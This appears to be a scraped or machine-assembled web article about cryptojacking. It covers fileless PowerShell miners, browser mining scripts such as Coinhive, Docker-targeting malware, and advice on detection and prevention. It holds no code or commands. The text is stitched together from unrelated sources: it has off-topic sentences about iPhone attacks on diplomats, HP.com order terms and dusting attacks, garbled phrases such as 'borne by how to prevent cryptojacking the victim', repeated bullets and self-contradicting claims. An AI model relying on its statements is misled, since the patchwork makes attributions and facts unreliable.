Whos Using Your Computers? Cryptojacking Degrades Network Performance

Clever cryptojackers like BadShell hide themselves within legitimate processes like Windows PowerShell through which they execute hidden malicious mining scripts. Few traditional antivirus programs will detect the threat, as they typically trust Windows signed executables like PowerShell by default.

Advanced fileless miners maliciously do their work in a computer’s memory, taking advantage of legitimate tools like PowerShell. Once verified, the solution is certified by the system as legitimate, and whoever solved it is rewarded with cryptocurrency. Also, those who were involved in verifying the solution’s validity receive a reward. Cryptocurrency mined on infected systems is sent to two wallets owned by the operators .

It’s unknown who’s behind the cyberattacks against at least nine employees’ iPhones, who are all involved in Ugandan diplomacy. The gang is using a variety of tools and malware to carry out attacks in volume on critical sectors, the FBI warned. However, Graboid was only known to operate for up to three months before its Docker Hub images were removed.

All About Cryptojacking

Commonly referred to as “malicious cryptomining”, cryptojacking occurs when cybercriminals hijack personal computers with the intent of installing malicious software. Symantec points out the increase in the last quarter coincided with a surge in the value of Bitcoin and Monero , two cryptocurrencies often mined by the threat actors that rely on browser-based cryptojacking malware. These are used to access cloud services and harness those resources to power their cryptomining activities. While any computer can technically be used for cryptomining, powerful systems are required to be competitive at cryptomining activities. This is because of the strong encryption used with cryptocurrencies. Because multiple cryptominers can work on a transaction, but only one will receive the reward, there is motivation to find maximum processing power, in order to cryptomine faster. Well, there is a well-said line i.e., “The future depends on what we do in the present” -The same scenario applies here also.

With browser-based cryptojacking, a threat actor can forego wide-cast infection campaigns and the need to infect myriad devices. Instead, they aim to compromise a few web servers and expect to reach untold numbers of site visitors. It’s better to prevent an attack from happening in the first place than to stop it. However, if you suspect you may have downloaded cryptojacking malware, the first thing to do is to remove it from your device.

Internet Security: What Is It, And How Can You Protect Yourself Online?

These new tokens and fees are deposited to wallets owned by the attacker, while the costs of mining—including electricity and wear and tear to computers—are borne by how to prevent cryptojacking the victim. Cryptojacking is a type of cyberattack in which a hacker co-opts a target’s computing power to illicitly mine cryptocurrency on the hacker’s behalf.

It still uses infected Facebook accounts to deliver malicious links, but can also steal web accounts and credentials, which allows it to inject cryptojacking code into those web pages. Cryptojacking can even infect Android mobile devices, using the same methods that target desktops. Or users’ phones can be redirected to an infected site, which leaves a persistent pop-under.

Understanding The Adversary: How Ransomware Attacks Happen

A blockchain is essentially a digital ledger of transactions that is duplicated and distributed across the entire network of computer systems that reside on the blockchain. The blockchain retains a detailed history of each digital transaction to protect the coins and keep them from being used more than once by the same person. In lieu of oversight by a government or central bank, cryptocurrency relies on a distributed ledger, the most common of which is a blockchain. It is a system of recording information that uses encryption and timestamping to make it difficult or impossible to alter or hack records. “The malicious request […] exhibits several similarities,” Unit 42 noted. “It’s the same attack pattern delivering the same cpuminer payload against the same industry , suggesting it’s likely the same perpetrator behind the cryptojacking operation.” A new report explores the methods cybercriminals are discussing most when looking to steal or mine cryptocurrency.

This same research, released by RWTH Aachen University in Germany, concludes that Monero accounts for 75 percent of all browser-based cryptocurrency mining. Like ransomware, cryptominers are not a new phenomenon; the ability to use computer resources to mine bitcoin without the help of specialized or powerful hardware have been around since at least 2011.

Protection Against Cryptomining Attacks

This novel cybersecurity attack, that is emerging in both the literature and in the wild, has proved to be very effective given the simplicity of running a crypto-client into a target device. Several countermeasures have recently been proposed, with different features and performance, but all characterized by a host-based architecture. The cited solutions, designed to protect the individual user, are not suitable for efficiently protecting a corporate network, especially against insiders. In this paper, we propose a network-based approach to detect and identify crypto-clients activities by solely relying on the network traffic, even when encrypted and mixed with non-malicious traces. First, we provide a detailed analysis of the real network traces generated by three major cryptocurrencies, Bitcoin, Monero, and Bytecoin, considering both the normal traffic and the one shaped by a VPN.

“We’ve seen attacks on enterprise servers and also on cloud infrastructure. We’ve seen all kinds of customers being affected by this.” Servers hijacked for cryptocurrency mining may lead to higher bills from your cloud provider or your power utility. CoffeeMiner uses a man-in-the-middle attack to hijack users connecting to WiFi hotspots and inject mining code into all HTML pages requested by those users.

Cryptocurrencies work in a similar way, but with a decentralized database. To stay in the know about recent cybercriminal developments, sign up to a 7-day free trial of Threat Intelligence with SearchLight. The best way to mitigate a dusting attack is to generate a new wallet address for every transaction. If you’re really blockchain savvy, some wallets allow you to parse funds received so that you avoid using the “dust” in subsequent transactions. This is actually a fairly simple attack to mitigate if you always double-check that the copied and pasted wallet addresses match.

How To Protect Yourself Against Cryptojacking

Cryptocurrency “dusting” is deanonymizing your crypto wallet by sending tiny amounts of crypto “dust” to multiple wallets. Threat actors then monitor these wallets’ transactions and perform a combined analysis of different addresses on the blockchain to uncover the identity of the entity behind each wallet. The malware is also capable of using scanning tools to identify other exposed Docker daemon APIs in order to expand its cryptojacking operations further.

• Whether attackers try to use malware, a browser-based drive-by download, or a Trojan , you’re protected against cryptojacking.
• It’s extremely hard to stop this type of attack once it has started.
• Don’t rejoice just yet — browser-based cryptojacking may see a resurgence in the near future due to the recent and sharp drop in the Monero hash rate.
• X-Force data from late 2018 and early 2019 showed that browser-based cryptojacking attacks are on the decline while also revealing a notable increase in malware-based attacks.
• The ill-intended miner will start running the code on your device by using its power to calculate “hashes”.

Cryptojacked or not, overheating on your device is a sign that something is wrong, so it’s important to find out why it’s happening sooner rather than let it continue. You must watch out for reduced and erratic performance, especially when using less resource-intensive software. Simply checking your email or scrolling through a spreadsheet is not enough to cause most personal computers to struggle, so if you do experience serious slowdown, you may want to investigate further. There’s a lot of room for growth and evolution,” says Marc Laliberte, threat analyst at network security solutions provider WatchGuard Technologies. Information security awareness education and training are of paramount importance in combatting Cryptojacking.

How Cybercriminals Execute Cryptojacking Attacks Today

That’s because the malware relied on a third-party to host its malicious payload – whereas WatchDog does not, allowing it to have remained active for more than two years, said researchers. When the binary identifies a vulnerable target, it attempts to compromise that identified system using a robust set of built-in application exploits. Join thousands of people who receive the latest breaking cybersecurity news every day. If we imagine ransomware as a brutal gladiator, then cryptojacking is more of a silent thief. The altered Coinhive code was used on government and popular websites, YouTube ads, and desktop apps. The German company took 30% commission of all mined cryptocurrencies, and 70% went to the websites’ owners. Instead, cybercriminals add a couple of lines of JavaScript to a website, and any system that loads the website will start mining.

Orders that do not comply with HP.com terms, conditions, and limitations may be cancelled. If you’ve used the same antivirus software for a long time, you may want to check the latest reviews and compare your options.

The mining information stored in this registry key value takes precedence if the data is present and legit. Otherwise, the malware falls back to its default data embedded in the binary. Web application firewallshould be able to spot or prevent the insertion of malicious code. In one 2020 case, a student at Louisiana State University confessed to having taken control of 169 university computers and using them to mine crypto.

• Whether you’ve been cryptojacked locally on your system, or through the browser, it can be difficult to manually detect the intrusion after the fact.
• NextGen Anti-Viruses such asCylancewill block known mining software from executing on a device, even when the author was purposely mining eth with his duel GPU’s on his personal desktop.
• In 2018, cryptojackers targeted the operational technology network of a European water utility control system, seriously impacting the operators’ ability to manage the utility plant.
• The malicious server relays these credentials and 2FA code to the real login page on the real server.
• Since its initial discovery, the malware has not been active, which signals a possible reinforcement and weaponization of the malware for a large-scale attack.

The attack is a prime example of cryptojacking, which is when attackers leverage malicious cryptomining for financial profit. They do so by hacking into devices to install software, which then uses the devices’ power and resources to mine for cryptocurrencies or to steal cryptocurrency wallets owned by the victims. The decentralized, anonymous nature of cryptocurrencies means there is no regulating body that decides how much of the currency to release into circulation. At first, anyone with a computer could mine cryptocurrency, but it quickly turned into an arms race. Today, most miners use powerful, purpose-built computers that mine cryptocurrency around the clock.

Charles DeBeck is a senior cyber threat intelligence strategic analyst with IBM X-Force Incident Response and Intelligence Services . Restrict outbound calls to cryptomining pools to help detect and prevent cryptomining within the organization’s environments. Malicious mining via compromised websites, also known as cryptojacking. Following this step, you can quarantine the malware or remove it altogether. However, no matter how advanced your anti-virus is, hackers these days are becoming increasingly smarter.

You could also consider using a network health monitoring tool that will help you identify abnormal GPU/CPU usage. Cryptojacking is when an attacker, or hacker, gains unauthorized access to a device and uses it to power their cryptomining efforts. By employing cryptojacking, cryptominers, or coinminers, are able to mine for more transactions faster. However, the cryptojacked system will increase its power consumption, and the cryptomining activities will slow the device’s processing capabilities—sometimes causing the system to fail. Cryptojacking is a combination of a malware attack and exploitation of co-opted computer resources.

Cryptojacking is a form of cyberattack where hackers hijack a target’s computer to stealthily mine cryptocurrency without the user’s awareness. As stunning as these intrusions are, cryptojacking of personal devices remains the more prevalent problem, since stealing little amounts from many devices can amount to large sums. In fact, criminals even seem to prefer cryptojacking to ransomware , as it potentially pays hackers more money for less risk. You might think, “Why use my phone and its relatively minor processing power? ” But when these attacks happen en masse, the greater number of smartphones out there adds up to a collective strength worth the cryptojackers’ attention.

• Cryptojacking rarely results in any serious damage to the victim, beyond impaired performance, increased electric bills, and higher IT overhead costs as attempts are made to address performance issues.
• You could also consider using a network health monitoring tool that will help you identify abnormal GPU/CPU usage.
• This same research, released by RWTH Aachen University in Germany, concludes that Monero accounts for 75 percent of all browser-based cryptocurrency mining.
• Analysis and insights from hundreds of the brightest minds in the cybersecurity industry to help you prove compliance, grow business and stop threats.
• Unlike its very first C2 request message, the rest of the miner’s status report messages are actually clear text.
• Like all pyramid schemes, the ransomware business model works well… for the people on the top.

The modern cryptojacking attack does not focus solely on mining cryptocurrency. Instead, cybercriminals leverage their access to accomplish multiple goals, such as combining cryptojacking and data theft.

Author: Joanna Ossinger